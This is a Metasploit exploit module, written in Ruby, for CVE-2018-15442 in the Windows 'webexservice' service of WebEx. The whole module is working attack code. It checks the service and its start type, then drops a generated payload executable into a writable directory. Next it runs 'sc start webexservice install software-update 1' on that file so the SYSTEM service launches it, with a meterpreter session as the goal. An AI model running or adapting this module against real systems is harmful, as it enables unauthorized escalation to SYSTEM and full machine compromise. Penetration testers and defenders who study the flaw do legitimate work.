WebEx - Local Service Permissions Exploit (Metasploit)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Accounts

  def initialize(info={})
    super( update_info( info,
      'Name'        => 'WebEx Local Service Permissions Exploit',
      'Description' => %q{
        This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,
        can be used to run arbitrary commands locally, and can be started by limited users in
        default installations.
      },
      'References' =>
        [
          ['URL', 'https://webexec.org'],
          ['CVE', '2018-15442']
        ],
      'DisclosureDate' => "Oct 09 2018",
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'
        ],
      'Platform'       => [ 'win'],
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
      'SessionTypes'   => [ "meterpreter" ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'WfsDelay' => 5,
          'ReverseConnectRetries' => 255
        },
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"])
    ])
    @service_name = 'webexservice'
  end

  def validate_arch
    return target unless target.name == 'Automatic'

    case sysinfo['Architecture']
    when 'x86'
      fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'
      vprint_status('Detected x86 system')
      return targets[1]
    when 'x64'
      vprint_status('Detected x64 system')
      return targets[2]
    end
  end

  def check_service_exists?(service)
    srv_info = service_info(service)

    if srv_info.nil?
      vprint_warning("Unable to enumerate services.")
      return false
    end

    if srv_info && srv_info[:display].empty?
      vprint_warning("Service #{service} does not exist.")
      return false
    else
      return true
    end
  end

  def check
    unless check_service_exists?(@service_name)
      return Exploit::CheckCode::Safe
    end

    srv_info = service_info(@service_name)

    vprint_status(srv_info.to_s)

    case START_TYPE[srv_info[:starttype]]
    when 'Disabled'
      vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
      return Exploit::CheckCode::Safe
    when 'Manual'
      vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
      return Exploit::CheckCode::Safe
    when 'Auto'
      vprint_good("Service is set to Automatically start...")
    end

    if check_search_path
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears
  end

  def check_write_access(path)
    perm = check_dir_perms(path, @token)
    if perm and perm.include?('W')
      print_good("Write permissions in #{path} - #{perm}")
      return true
    elsif perm
      vprint_status ("Permissions for #{path} - #{perm}")
    else
      vprint_status ("No permissions for #{path}")
    end

    return false
  end


  def exploit
    begin
      @token = get_imperstoken
    rescue Rex::Post::Meterpreter::RequestError
      vprint_error("Error while using get_imperstoken: #{e}")
    end

    fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token

    if is_system?
      fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.")
    end

    print_status("Checking service exists...")
    if !check_service_exists?(@service_name)
      fail_with(Failure::NoTarget, "The service doesn't exist.")
    end

    if is_uac_enabled?
      print_warning("UAC is enabled, may get false negatives on writable folders.")
    end

    # Use manually selected Dir
    file_path = datastore['DIR']

    @exe_file_name = Rex::Text.rand_text_alphanumeric(8)
    @exe_file_path = "#{file_path}\\#{@exe_file_name}.exe"

    service_information = service_info(@service_name)

    # Check architecture
    valid_arch = validate_arch
    exe = generate_payload_exe(:arch => valid_arch.arch)

    #
    # Drop the malicious executable into the path
    #
    print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...")
    begin
      write_file(@exe_file_path, exe)
      register_file_for_cleanup(@exe_file_path)
    rescue Rex::Post::Meterpreter::RequestError => e
      # Can't write the file, can't go on
      fail_with(Failure::Unknown, e.message)
    end

    #
    # Run the service
    #
    print_status("Launching service...")
    res = cmd_exec("cmd.exe",
      "/c sc start webexservice install software-update 1 #{@exe_file_path}")

    if service_restart(@service_name)
      print_status("Service started...")
    else
      service_information = service_info(@service_name)
      if service_information[:starttype] == START_TYPE_AUTO
        if job_id
          print_status("Unable to start service, handler running waiting for a reboot...")
          while(true)
            break if session_created?
            select(nil,nil,nil,1)
          end
        else
          fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
        end
      else
        fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...")
      end
    end
  end
end